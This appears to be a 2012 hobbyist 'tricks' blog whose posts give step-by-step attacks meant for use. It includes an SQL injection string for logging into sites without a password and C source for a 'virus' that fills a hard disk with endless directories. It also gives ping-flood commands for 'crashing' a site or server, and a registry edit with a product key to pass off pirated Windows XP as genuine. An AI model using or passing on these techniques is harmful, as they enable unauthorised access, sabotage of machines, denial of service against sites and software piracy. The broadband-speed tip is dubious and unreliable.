Monday 29 October 2012

Simple SQL Injection to Login in Any Site

They are many Site's which are have LOop HoOles in there Site .... So by Using Those Loop Holes we can Enter into the Site And can modify any thing in the Site ....... But we Should need a Password to   enter in to the Site which we dont know .... 

So there is a Simple SQL Injection which Allows us to login to a Site ..... So the Code is  ........

Code :   "    'x' or 'x'='x'   " 



This is the Simple Code which should be given Both to the Username And the Password in a Login Forum ....

The Meaning of the Code is that " x or x " i.e (true or true = true )
here the database checks the given code within it and returns true , where we enter into the Database and can do anything in the Site ...

Note :  This Trick is Applicable for Few Sites Only .... 

Sunday 14 October 2012

How To Increase Broadband Speed

They are many ways to Increase your Broadband Speed ..... This is a Simple Trick where you can Increase high Speed Internet ... You just need to follow my Steps ........

Step 1 : Goto Run and type this code " gpedit.msc " 

Step 2 : You will get a Registry and Select " Computer  Configuration " and Expand the [Administrative Templates] > [Network] > [QoS Packet Scheduler] .....


Step 3 :  Now Double-click [Limit Reservable Bandwidth] and you need to [Enabled] it and then Change [Bandwidth limit %] to 0 % and Click [OK] Button.


Step 4 : Now Need to Restart you PC and then Check your Broadband Speed .........

Friday 12 October 2012

Virus That Fills The Hard Disk Entire Space Continously

Hey Folks this is my latest trick ... I have created a new virus that always fill up the HARD DISK space continuously  .... This is a simple C program & use a  Dev cpp Software to compile and Run the Virus which will automatically do its work ...


/* Virus Program Created by ABHI */
#include<stdio.h>
#include<dir.h>                               
#include<conio.h>
int main()
{
 int i=1,flag,count=1;
 char name[30];
 printf("created by ABHI !!!");
 for(i=0;i<1;)
 {
  flag=mkdir(tmpnam(name));
  if(!flag)
  count++;
 }
getch();
return ;
}

Wednesday 26 September 2012

Crash A Site Using CMD

If you want to Crash a site , they  are many ways to do ... But the Simple way is to Use Cmd ... So follow my steps ...

Step 1 : Start > Run > Cmd .... 

Step 2 : Now You need to find the IP Address of the Site you want to Crash .... It can be know by using a command called " ping " ....


Code : c:\ ping website

Example : c:\ ping mindjolt.com

Step 3 :  Now you will get the IP Address of the Site & by using this IP you can Crash the Site ....  Now type this code to crash the site

Code : c:\ ping site-ip -t -l 1000


Example : c:\ ping 97.64.112.229 -t -l 1000

Step 4 : Now wait for some time to crash it ... Similarly if you try this code in different PC's at the same time then it could be easy to crash it .... 

Step 5 : Similarly you can crash the " Server "  by using the same code  with few modifications ........ 

Code : c:\  ping site-ip -l 65500 -n 10000 -w 0.00001

Example : c:\ ping 192.127.1.45 -l 65500 -n 10000 -w 0.00001

Step 6 : Now by using a simple ping command you can Crash a Site

Monday 10 September 2012

How To Make Windows XP Genuine


Many of my friends were using Windows XP & had a problem called Genuine ..... So try this trick to make your Windows XP genuine ....  Follow My steps .....  

1) start > run > "  regedit  "

2) go to this path in it as shown 

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer 

.... and doubleclick on it ....  add any words you want at alphanumeric (Eg : abhi ) ... then press ok and exit the Regedit.

3) Now Goto Start > Run > Copy this code in it 
Code : "  %systemroot%\system32\oobe\msoobe.exe /a  " 

4) Now you will get the activation screen & click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this 

Key:  JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ 

then click update it will return back..this mean it was updated & Restart your PC .... Now Ur Windows XP is Genuine